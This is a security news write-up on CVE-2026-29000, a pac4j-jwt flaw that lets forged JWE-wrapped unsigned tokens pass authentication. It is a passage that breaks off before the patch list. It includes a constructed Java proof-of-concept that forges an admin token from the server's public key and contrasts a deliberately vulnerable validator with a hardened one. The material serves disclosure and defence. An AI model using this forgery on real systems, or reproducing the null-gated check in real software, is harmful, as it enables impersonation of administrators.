Cybersecurity researchers have uncovered a critical vulnerability in pac4j-jwt, a popular Java-based library used to secure thousands of applications through JSON Web Tokens (JWT). The flaw, tracked as CVE-2026-29000 with a maximum CVSS score of 10.0, allows any remote attacker to forge administrative credentials, provided they possess the server’s RSA public key.
The vulnerability, discovered by the CodeAnt AI Security Research Team, resides in the JwtAuthenticator component during its handling of encrypted tokens (JWE).
Standard JWT security relies on a signature (JWS) to prove a token’s integrity. However, many enterprise systems also use encryption (JWE) to hide the token’s contents. The flaw in pac4j-jwt occurs when these two features are combined.
- The “JWE-wrapped PlainJWT” Trick: An attacker can create a “PlainJWT”, a token with no signature, and wrap it inside a JWE encrypted with the server’s public key.
- The Logic Error: When the server decrypts the token, the library’s internal `toSignedJWT()` function correctly returns `null` because the inner token is unsigned. However, the subsequent signature verification block is entirely skipped because it is gated by a simple null-check.
- Silent Authentication: The library then proceeds to create a user profile using the unverified claims inside the token, essentially treating the forged “PlainJWT” as a trusted identity.
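The three steps above, reproduced as an added example that is not pac4j’s own code. It uses the Nimbus JOSE+JWT library (which pac4j-jwt builds on) to forge a JWE-wrapped PlainJWT with nothing but the server’s RSA public key, then runs the token through two constructed validators: one with the null-gated signature check the article describes, and a hardened one that refuses any inner token that is not a signed JWT. The class and method names, and the use of a single RSA key pair for both decryption and signature verification, are assumptions made for the demonstration.

```java
import com.nimbusds.jose.EncryptionMethod;
import com.nimbusds.jose.JOSEException;
import com.nimbusds.jose.JWEAlgorithm;
import com.nimbusds.jose.JWEHeader;
import com.nimbusds.jose.JWEObject;
import com.nimbusds.jose.Payload;
import com.nimbusds.jose.crypto.RSADecrypter;
import com.nimbusds.jose.crypto.RSAEncrypter;
import com.nimbusds.jose.crypto.RSASSAVerifier;
import com.nimbusds.jose.jwk.RSAKey;
import com.nimbusds.jose.jwk.gen.RSAKeyGenerator;
import com.nimbusds.jwt.JWTClaimsSet;
import com.nimbusds.jwt.JWTParser;
import com.nimbusds.jwt.PlainJWT;
import com.nimbusds.jwt.SignedJWT;

import java.security.interfaces.RSAPrivateKey;
import java.security.interfaces.RSAPublicKey;
import java.text.ParseException;

// Constructed demo, not pac4j code. Requires com.nimbusds:nimbus-jose-jwt on the classpath.
public class JweWrappedPlainJwtDemo {

    // Attacker side: only the server's RSA public key is needed.
    static String forgeToken(RSAPublicKey serverPublicKey) throws JOSEException {
        JWTClaimsSet claims = new JWTClaimsSet.Builder()
                .subject("admin")          // arbitrary subject
                .claim("role", "ADMIN")    // arbitrary role
                .build();
        PlainJWT unsigned = new PlainJWT(claims);   // alg=none, no signature at all
        JWEHeader header = new JWEHeader.Builder(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM)
                .contentType("JWT")
                .build();
        JWEObject jwe = new JWEObject(header, new Payload(unsigned.serialize()));
        jwe.encrypt(new RSAEncrypter(serverPublicKey));  // wrap the PlainJWT in a JWE
        return jwe.serialize();
    }

    // Vulnerable pattern (constructed): signature verification gated on a null check.
    static JWTClaimsSet vulnerableValidate(String token, RSAPrivateKey decryptKey, RSAPublicKey verifyKey)
            throws ParseException, JOSEException {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(decryptKey));
        SignedJWT signed = jwe.getPayload().toSignedJWT();   // null: inner token is a PlainJWT
        if (signed != null && !signed.verify(new RSASSAVerifier(verifyKey))) {
            throw new JOSEException("invalid signature");
        }
        // Reached with signed == null: claims are taken from the unsigned inner token.
        return JWTParser.parse(jwe.getPayload().toString()).getJWTClaimsSet();
    }

    // Hardened pattern (constructed): an unsigned inner token is an error, not a pass.
    static JWTClaimsSet hardenedValidate(String token, RSAPrivateKey decryptKey, RSAPublicKey verifyKey)
            throws ParseException, JOSEException {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(decryptKey));
        SignedJWT signed = jwe.getPayload().toSignedJWT();
        if (signed == null) {
            throw new JOSEException("inner token must be a signed JWT");
        }
        if (!signed.verify(new RSASSAVerifier(verifyKey))) {
            throw new JOSEException("invalid signature");
        }
        return signed.getJWTClaimsSet();
    }

    public static void main(String[] args) throws Exception {
        // Single RSA key pair for the server; the attacker sees only the public half.
        RSAKey serverKey = new RSAKeyGenerator(2048).generate();
        RSAPublicKey pub = serverKey.toRSAPublicKey();
        RSAPrivateKey priv = serverKey.toRSAPrivateKey();

        String forged = forgeToken(pub);

        JWTClaimsSet accepted = vulnerableValidate(forged, priv, pub);
        System.out.println("vulnerable validator accepted sub=" + accepted.getSubject()
                + " role=" + accepted.getStringClaim("role"));

        try {
            hardenedValidate(forged, priv, pub);
        } catch (JOSEException e) {
            System.out.println("hardened validator rejected: " + e.getMessage());
        }
    }
}
```

The practical check for any JWE-then-JWS validator is the `signed == null` branch: the decrypted payload must be required to be a `SignedJWT`, and the claims must be read from that verified object rather than re-parsed from the raw payload.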
By forging a token with arbitrary “subject” and “role” claims, an attacker can impersonate any user, including system administrators, without ever knowing the server’s private signing key. This leads to:
- Total System Compromise: Full access to administrative panels and sensitive data.
- Lateral Movement: The ability to pivot into deeper corporate networks using hijacked credentials.
The maintainer of pac4j, Jérôme Leleu, has confirmed the flaw and released patches across all active development lines. Organizations using pac4j-jwt must prioritize these updates immediately: